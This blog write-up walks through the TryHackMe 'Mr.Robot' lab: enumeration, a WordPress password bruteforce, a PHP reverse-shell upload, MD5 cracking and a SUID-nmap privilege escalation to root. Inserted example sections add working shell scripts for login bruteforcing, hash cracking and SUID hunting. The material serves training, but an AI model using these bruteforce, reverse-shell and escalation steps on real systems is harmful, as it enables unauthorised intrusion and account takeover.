TryHackMe -Mr.Robot

Software Sinner
6 min read · May 6, 2021

This is my 16th write-up and I will be discussing my experience with the machine “Mr.Robot” from TryHackMe. TryHackMe is a great platform for people who are starting out in the InfoSec field and want to sharpen their skills in networking, Linux, hacking, etc. The platform is very hands-on with its training material and keeps it fun for learners. This was a cool challenge and was created based on one of my favorite TV shows, “Mr. Robot”. A WordPress password bruteforce lands you in Elliot’s admin panel, which allows a php-reverse-shell to be uploaded and gives a low-privileged shell on the box. An nmap binary with the SUID bit set then allows a privilege escalation to root.

Step 1: Enumeration

When conducting a penetration test there are roughly five phases, and you don’t necessarily have to follow them in strict sequence, but working through them stepwise tends to yield better results. I started off with an Nmap scan against this machine to see what ports and service versions were exposed, and decided there was no need for a second scan type. It does not hurt to run two different kinds of Nmap scans, because one may return more than the other depending on the flags used (a -p- scan covers all 65535 TCP ports rather than the default top 1000, for instance). The scan I kicked off used the default scripts (-sC) and version detection (-sV) flags. If it is your first time learning about Nmap I would check out HackerSploit’s YouTube tutorials.

sinner@kali:~$ sudo nmap -sC -sV 10.10.192.59
[sudo] password for sinner:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 12:24 EDT
Nmap scan report for 10.10.192.59
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp closed http
443/tcp closed https
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds

Nmap reports a port as closed when the host answers the probe (with a TCP RST) but nothing is listening on it; filtered means no reply came back at all, usually because a firewall dropped the probe; and open|filtered is the state Nmap uses when it cannot tell those two apart. A closed port therefore at least tells you the host is reachable and is not filtering that port. If a port shows as closed but the service plainly answers in a browser, rerun the scan, since a box that is still booting can produce exactly that picture. I started off with visiting port 80 by entering the box’s IP in my web browser.

A Mr.Robot-style intro kicked off in the browser, and for a second it felt like I was in the show. I proceeded with some further enumeration of the web pages to see what I could land on. The first page I like to visit is robots.txt, by appending /robots.txt to the URL.

robots.txt

robots.txt tells crawlers which paths the site owner does not want indexed, which is exactly why it is worth reading: it often points at files the owner wanted to keep quiet. In this case you can see fsocity.dic and one of the flags, key-1-of-3.txt. I pulled these files down using wget onto my machine.

Example, typed in a terminal (and repeated for the two files it lists):

wget http://10.10.192.59/robots.txt

Now that I had the first flag I needed two more to complete this box. The second file was interesting because it looked like a list of potential usernames/passwords. I looked at the word count of this file and it was large!

The file needed some cleanup because of duplicates, so I deduplicated it and verified the word count again; this time it was well below the original.
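The write-up does not show the cleanup command it ran, so here is an added example (not from the original post) of the same step: deduplicate a raw wordlist and confirm the reduction with before/after line counts. The file paths and the handful of sample words are constructed stand-ins for fsocity.dic.

```bash
#!/bin/sh
# Added example, not part of the original write-up: reduce a raw wordlist such
# as fsocity.dic to its unique entries and confirm the shrink with line counts.
# File names and the sample words are constructed for illustration.

# Print the number of lines in a file, without wc's padding.
count_lines() {
    wc -l < "$1" | tr -d ' '
}

# Write the unique entries of $1 to $2. sort -u sorts and drops duplicates;
# CRs are stripped first because "word" and "word\r" are different lines to
# sort and would survive as two candidates that both waste bruteforce time.
dedup_wordlist() {
    tr -d '\r' < "$1" | sort -u > "$2"
}

# Construct a small wordlist with repeats (stand-in for fsocity.dic).
make_sample_wordlist() {
    printf '%s\n' elliot mrrobot fsociety elliot abcdef fsociety elliot > "$1"
}

tmp=$(mktemp -d)
make_sample_wordlist "$tmp/raw.dic"
dedup_wordlist "$tmp/raw.dic" "$tmp/clean.txt"
echo "before: $(count_lines "$tmp/raw.dic") lines, after: $(count_lines "$tmp/clean.txt") lines"
```

Against the real file the same two commands are all that is needed; the point of counting both sides is to catch the case where nothing was actually removed (for example because every line carried a trailing CR).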

Now that the file was cleaned up and ready for use I needed to find a page that I could bruteforce with the wordlist. I ran a directory-busting tool to locate other hidden pages.

Example directory-busting command:

gobuster dir -u http://10.10.192.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Results:

Visited /wp-admin by appending it to the URL and was presented with a Wordpress login page.

There are many tools available for bruteforcing login pages. I chose WPScan’s built-in password attack and ran the following command (-t sets the number of threads, -U the username to try, -P the wordlist):

wpscan --url http://10.10.89.214 -t 50 -U elliot -P /home/kali/Documents/tryhackme/mr-robot/fsociety.txt

I guessed the username to be elliot and got lucky. A more systematic approach is to enumerate usernames first: the WordPress login form returns a different error for an unknown username than for a wrong password, so a tool like hydra, Metasploit’s WordPress login module, or wpscan’s own user enumeration (-e u) can run the wordlist through the username field and report which entries exist, and the password bruteforce is then only run against those.
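To make the two-phase idea concrete, here is an added example (not from the original post or from WPScan) of what the bruteforce tools do under the hood: one POST to wp-login.php, a classifier for the three answers the form gives away, and a username-enumeration pass followed by a password pass. The target URL, the usernames and the sample responses are constructed; the field names and the test-cookie requirement are WordPress’s own.

```bash
#!/bin/sh
# Added example, not part of the original write-up: one login attempt against
# wp-login.php, plus a classifier for the three answers the form gives away.
# The target URL, the usernames and the sample responses are constructed.

# Classify a wp-login.php response from its raw headers and body.
# Prints: success | bad_password | bad_username | unknown
classify_wp_login() {
    hdrs=$1
    body=$2
    if printf '%s\n' "$hdrs" | grep -qi '^set-cookie: *wordpress_logged_in_'; then
        echo success            # the logged-in cookie is only set after a valid login
    elif printf '%s\n' "$body" | grep -qi 'password you entered for the user'; then
        echo bad_password       # username exists: this wording is what leaks it
    elif printf '%s\n' "$body" | grep -qiE 'invalid username|unknown username|not registered on this site'; then
        echo bad_username
    else
        echo unknown            # lockout plugin, captcha, WAF, non-WordPress page ...
    fi
}

# One POST to wp-login.php. WordPress refuses the login unless its test cookie
# is present, so it is sent along with the fields the real form submits.
wp_login_attempt() {
    url=$1 user=$2 pass=$3
    tmp=$(mktemp)
    curl -s -o "$tmp.body" -D "$tmp.hdr" \
        -b 'wordpress_test_cookie=WP+Cookie+check' \
        --data-urlencode "log=$user" \
        --data-urlencode "pwd=$pass" \
        --data-urlencode 'wp-submit=Log In' \
        --data-urlencode 'testcookie=1' \
        "$url/wp-login.php"
    classify_wp_login "$(cat "$tmp.hdr")" "$(cat "$tmp.body")"
    rm -f "$tmp" "$tmp.body" "$tmp.hdr"
}

# Phase 1: run the wordlist through the username field with a junk password
# and keep every entry the server does not reject as an unknown user.
enumerate_users() {
    url=$1 wordlist=$2
    while IFS= read -r u || [ -n "$u" ]; do
        [ "$(wp_login_attempt "$url" "$u" 'not-the-password')" = bad_username ] || printf '%s\n' "$u"
    done < "$wordlist"
}

# Phase 2: try the wordlist as passwords for one confirmed user; stop on success.
bruteforce_password() {
    url=$1 user=$2 wordlist=$3
    while IFS= read -r p || [ -n "$p" ]; do
        if [ "$(wp_login_attempt "$url" "$user" "$p")" = success ]; then
            printf '%s:%s\n' "$user" "$p"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Example session (network calls, so not executed by this file on its own):
#   enumerate_users     http://10.10.192.59 fsociety.txt > users.txt
#   bruteforce_password http://10.10.192.59 elliot fsociety.txt
```

The classifier is the part worth keeping even if you use hydra or wpscan: whenever a tool reports nothing but “unknown”, it is usually because a lockout plugin or WAF has started answering instead of wp-login.php, and the attack should be slowed down rather than left running.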

Used the discovered credentials to log into Elliot’s Wordpress account.

Step 2: Exploitation

Browsing around I noticed that the theme editor lets you modify the PHP files of the installed theme. WordPress is written in PHP, so anything that lands in a file the server executes gives you code execution. I created a php-reverse-shell file and uploaded it. I saw others do this by pasting the shell into a theme template through the editor, but I was able to get it to execute from the posts section by attaching the PHP file as media.

You can find the php-reverse-shell template on Kali (Pentest Monkey’s php-reverse-shell.php, shipped under /usr/share/webshells/php/). Edit the $ip and $port variables in the file to your attacking machine’s IP and the port your listener will wait on, so the shell connects back once the file is executed on the server.

changes made to my shell file

In my terminal I set up a Netcat listener on that port to catch the connection once the file was uploaded and executed.

nc -lvp 6666

Going back to the WordPress panel I uploaded my shell as a media file and attached it to a post from the edit-post screen.

As soon as I hit the post button the shell connected back to my machine as a low-privileged shell running as the web server’s user.

Looking around the directories I peeked into /home and saw that there was a local user account called ‘robot’. Peeking further I saw two files in that user’s home directory, one of them being the next flag. Unfortunately only the user ‘robot’ had permission to read that file.

The second file was interesting not only because it’s called “password” but also because it appears to be world-readable. Taking the filename at face value, it looks like an MD5 hash of the user’s password 🤔

I took the easy way out: instead of getting fancy with hash-cracking tools I uploaded the hash to CrackStation’s website:

https://crackstation.net/

too easy
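CrackStation works because the hash is unsalted MD5 and the password is in a common wordlist, and the same thing can be done offline without handing the hash to a third party. The following is an added example, not from the original post: a wordlist attack on a “user:hash” line with nothing but md5sum. The hash line and the wordlist are constructed (the hash is md5 of the string “password”); the real file from the box is not reproduced here.

```bash
#!/bin/sh
# Added example, not part of the original write-up: crack an unsalted MD5 hash
# offline against a wordlist instead of pasting it into a website. The hash
# line and the wordlist below are constructed; the hash is md5("password").

# Pull the hex digest out of a line that is either "<hash>" or "user:<hash>",
# normalising to lowercase and stripping any trailing newline or CR.
extract_hash() {
    printf '%s' "$1" | sed 's/^[^:]*://' | tr 'A-F' 'a-f' | tr -d '[:space:]'
}

# MD5 of one candidate. printf '%s' matters here: echo appends a newline, and
# md5("password\n") is not md5("password"), a classic cause of missed matches.
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Try every wordlist entry against the target; print the first match.
# Returns 1 if nothing in the list hashes to the target.
crack_md5() {
    target=$(extract_hash "$1")
    wordlist=$2
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed inputs: a "user:hash" line of the kind a leaked password file
# might hold, and a tiny stand-in for the deduplicated fsociety wordlist.
tmp=$(mktemp -d)
printf '%s\n' fsociety elliot password mrrobot > "$tmp/words.txt"
sample_line='someuser:5f4dcc3b5aa765d61d8327deb882cf99'

crack_md5 "$sample_line" "$tmp/words.txt" || echo "no match in wordlist"
```

A shell loop like this is fine for a few thousand candidates; for a real wordlist use hashcat (-m 0 is raw MD5) or john (--format=Raw-MD5), which do the same comparison millions of times per second and already handle the user:hash layout.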

Now that I had the password I did a su to the robot user and grabbed the next flag.

The last flag for most challenges is almost always in the /root directory, which only the root user can access. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abuse them: a SUID-root binary runs with root’s effective uid no matter who launches it, so any way of making it execute a command of your choosing runs that command as root.

Identifying which one to abuse generally comes down to experience and practice, and to checking each unusual entry in the list against GTFOBins.

Doing some research I found the GTFOBins entry for nmap: older versions ship an interactive mode from which shell commands can be run, so when the binary is SUID root that shell comes up as root.
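As an added example (not from the original post), here is the SUID hunt and the nmap check as a script: list every SUID binary, and for any nmap among them decide whether the GTFOBins interactive route applies. The version range used (2.02 to 5.21 still have --interactive) is GTFOBins’ own note; the helper names are mine, and the escalation commands are only quoted in a comment, not executed.

```bash
#!/bin/sh
# Added example, not part of the original write-up: enumerate SUID binaries and
# check whether a SUID nmap is old enough for the GTFOBins interactive-mode
# trick. The version range (2.02 to 5.21 have --interactive) is GTFOBins'
# note; everything else is illustrative.

# Every file with the SUID bit set. Permission errors under /proc are normal,
# hence 2>/dev/null; "|| true" keeps find's non-zero status from tripping set -e.
list_suid() {
    find / -perm -4000 -type f 2>/dev/null || true
}

# Print "yes" if an nmap at version $1 (e.g. 3.81) still has --interactive.
nmap_has_interactive() {
    [ -n "$1" ] || { echo no; return 0; }
    printf '%s\n' "$1" | awk -F. '{
        maj = $1 + 0; min = $2 + 0
        old_enough = (maj > 2 || (maj == 2 && min >= 2))
        new_enough = (maj < 5 || (maj == 5 && min <= 21))
        r = (old_enough && new_enough) ? "yes" : "no"
        print r
    }'
}

# Version string of the nmap binary at path $1, or nothing if it will not run.
nmap_version_of() {
    "$1" --version 2>/dev/null | sed -n 's/^Nmap version \([0-9.]*\).*/\1/p'
}

# Report any SUID nmap and whether the interactive route applies to it.
# The escalation itself (from GTFOBins, not executed here) is:
#     nmap --interactive
#     nmap> !sh
# GTFOBins notes that input echo is disabled in the resulting shell.
check_suid_nmap() {
    list_suid | grep '/nmap$' | while IFS= read -r f; do
        v=$(nmap_version_of "$f")
        echo "SUID nmap: $f (version ${v:-unknown}, --interactive: $(nmap_has_interactive "$v"))"
    done
}

check_suid_nmap
```

Two checks worth doing once you are in: run id and confirm the euid is 0, because some shells drop an effective uid that differs from the real one unless started with -p; and if the nmap turns out to be newer than 5.21, GTFOBins lists a second route for SUID nmap that runs a Lua NSE script containing os.execute("/bin/sh") via --script, which does not depend on interactive mode.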
